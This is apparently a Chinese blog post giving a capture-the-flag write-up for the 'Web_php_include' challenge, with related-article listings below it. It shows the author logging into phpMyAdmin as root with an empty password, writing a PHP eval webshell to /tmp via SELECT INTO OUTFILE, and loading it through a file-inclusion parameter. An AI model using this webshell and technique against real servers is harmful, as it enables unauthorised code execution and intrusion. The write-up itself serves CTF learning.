攻防世界(高手进阶区)——Web_php_include

最新推荐文章于 2024-05-24 22:45:00 发布
最新推荐文章于 2024-05-24 22:45:00 发布
阅读量1.7k 收藏 6
点赞数 1
分类专栏: CTF学习
生活会辜负努力的人,但不会辜负一直努力的人——Leo的个人博客。
本文链接:https://blog.csdn.net/zouchengzhi1021/article/details/104271089
版权

做完此题后参考了其他大佬写的wp,发现方法不同,此题我才用的是通过一句话木马注入。
在这里插入图片描述

使用御剑扫一下目录:
在这里插入图片描述
发现熟悉的http://111.198.29.45:53486/phpmyadmin/,打开链接:

一般username与password都为root,但此题的username为root,密码为空;

在SQL处写入一句话木马和文件包含:

select "<?php eval(@$_POST['flag']); ?>"into outfile '/tmp/test.php'

点击执行。

用蚁剑连接(注意在URL地址后加?page=/tmp/test.php )
在这里插入图片描述
在第一个文件发现flag
在这里插入图片描述

LEO-max
关注
  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
【网络安全 | CTF】攻防世界 Web_php_includephp伪协议|data伪协议|file伪协议】
等风来
05-22 9562
PHP 语言中一个重要的文件包含机制,可以将一个 PHP 文件包含到另一个 PHP 脚本文件中。该机制通常用于代码复用和模块化开发,在不同的 PHP 文件之间实现函数和类等代码的共享。file 伪协议用于访问本地文件系统中的文件,可以在 web 页面中链接到本地文件,或者读取本地文件中的数据。PHP 伪协议是一种特殊的 URI 协议,可以绕过通常的协议限制,直接访问本地文件和执行 PHP 代码。函数,该函数返回当前工作目录的绝对路径。函数,该函数返回当前执行的 PHP 脚本所在位置的绝对路径。
Web_php_include总结五种解法大同小异
yingyugo的博客
11-18 3356
Web_php_include解题详解 ————一念既出,万山无阻 分析——解题——总结 1.分析 代码不长,咱们慢慢分析 第一句是语法高亮,show_source() 函数对文件进行语法高亮显示。 本函数是 highlight_file() 的别名。 第二句是get 传给hello参数这里可以构造payload: /?hel
攻防世界Web_php_include详解
weixin_63810302的博客
06-21 4416
ctf学习记录
[CTF_网络安全] 攻防世界 Web_php_include 解题详析(php伪协议、data伪协议、file伪协议)
最新发布
2401_84208172的博客
05-24 1178
[CTF_网络安全] 攻防世界 Web_php_include 解题详析(php伪协议、data伪协议、file伪协议),该题考察文件包含漏洞,涉及PHP伪协议data伪协议file伪协议及PHP内置函数等知识点,希望读者躬身实践。黑客&网络安全如何学习。
攻防世界-web-Web_php_include(文件包含与伪协议)
2301_77300311的博客
05-04 567
先进行base64编码再urlencode后,构造data://伪协议,payload如下。strstr() 函数搜索字符串在另一字符串中是否存在,如果是,返回该字符串及剩余部分,否则返回 FALSE。由于strstr()函数和函数都是分大小写的,那么我们完全可以使用大写的PHP://来绕过过滤。既然过滤了php://的伪协议,我们可以使用其他协议,这里使用data://伪协议。从代码中得知,page参数中带有php://的都会被替换成空。方法三(php://伪协议、大小写过滤)方法二(御剑+菜刀)
Web_php_include
怪味巧克力的博客
05-25 4222
知识点: 1.strstr(): 定义和用法: strstr() 函数搜索字符串在另一字符串中是否存在,如果是,返回该字符串及剩余部分,否则返回 FALSE。 该函数是分大小写的, stristr() 函数不分大小写。 语法 strstr(string,search,before_search) 参数 描述 string 必需。规定被搜索的字符串。 search 必需。规定要搜索的字符串。如果该参数是数字,则搜索匹配该数字对应的 ASCII 值的字符。 before_searc
awd攻防比赛总结——3s_NwGeek.docx
09-30
AWD 攻防比赛总结 AWD 攻防比赛总结是关于一场线下的 AWD 攻防对抗赛的总结报告,报告作者 3s_NwGeek 分享了在比赛中的经验和心得。该报告主要集中在 Web 环境下的个人领悟到的技巧和心得。 首先,作者介绍了比赛...
攻防世界—-(web进阶)FlatScience–WP
12-14
在这个“攻防世界—-(web进阶)FlatScience–WP”的挑战中,我们需要解决一个Web安全相关的谜题。这个谜题涉及到多个技术点,包括Web应用漏洞利用、数据库注入、PDF文件处理以及哈希算法的应用。 首先,我们注意到...
攻防实训」洞察威胁,全面保护——Microsoft_Threat_Protection_侦测调 - 安全开发.zip
11-27
《洞察威胁,全面保护——Microsoft Threat Protection 侦测调》 在网络安全日益严峻的今天,Microsoft Threat Protection(MTP)成为了一种强大的解决方案,旨在帮助企业和组织防御不断演变的网络威胁。这款产品...
jiangzuo.rar_cloud computing java_网络攻防_防火墙
09-21
网络技术以及云计算系列讲解,包括网络攻防,防火墙技术等
攻防世界杂项m0-01
11-13
攻防世界杂项m0_01,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127836871
Web_php_include-xctf
qq_43660551的博客
07-03 969
RCE-PHP
ctf-攻防世界-webWeb_php_include
一只菜鸟的博客
11-21 5752
先看题目标题,php_include,猜测为文件包含漏洞。 打开环境,看到这样一段代码:
攻防世界WEB——Web_php_include
Zeker62的博客
08-16 449
借鉴了别人的博客:https://www.cnblogs.com/xhds/p/12218471.html但是还是要自己总结一下 源代码是这样的 <?php show_source(__FILE__); echo $_GET['hello']; $page=$_GET['page']; while (strstr($page, "php://")) { $page=str_replace("php://", "", $page); } include($page); ?> 这里有几个函
攻防世界Web_php_include
2202_75317918的博客
04-13 842
攻防世界Web_php_include
Web_php_include-攻防世界
szhangliwenya的博客
03-25 1088
secure_file_priv 这个变量被用于限制导入和导出的数据目录,比如 LOAD DATA 和 SELECT ... INTO OUTFILE 语句,以及 LOAD_FILE() 函数。MySQL 服务器在启动时,会检查 secure_file_priv 变量值,如果值不安全会在错误日志中写一个 WARNING 级别的日志。如果指定了目录,MySQL 会限制只能从该目录导入、或导出到该目录。下述使用data://伪协议,它让用户控制输入流,输入php代码,造成任意代码执行。
攻防世界-Web_php_include (四种解法)
笑花大王
01-20 4496
攻防世界-Web_php_include (考察的是文件包含) 打开页面是这样一段代码从代码中得知page中带有php://的都会被替换成空 str_replace()以其他字符替换字符串中的一些字符(分大小写) strstr() 查找字符串首次出现的位置。返回字符串剩余部分 <?php show_source(__FILE__); echo $_GET['hello'];...
WEBWeb_php_include(多解)
sleepywin的博客
07-16 1153
解题
攻防世界web_php_include
03-16
攻防世界中的 web_php_include 是一种漏洞,它指的是在 PHP 程序中使用 include 或 require 语句加载文件时可能存在的安全问题。这种漏洞可能导致远程代码执行攻击,允许攻击者在服务器上执行任意代码。为了防止这种...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

LEO-max

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值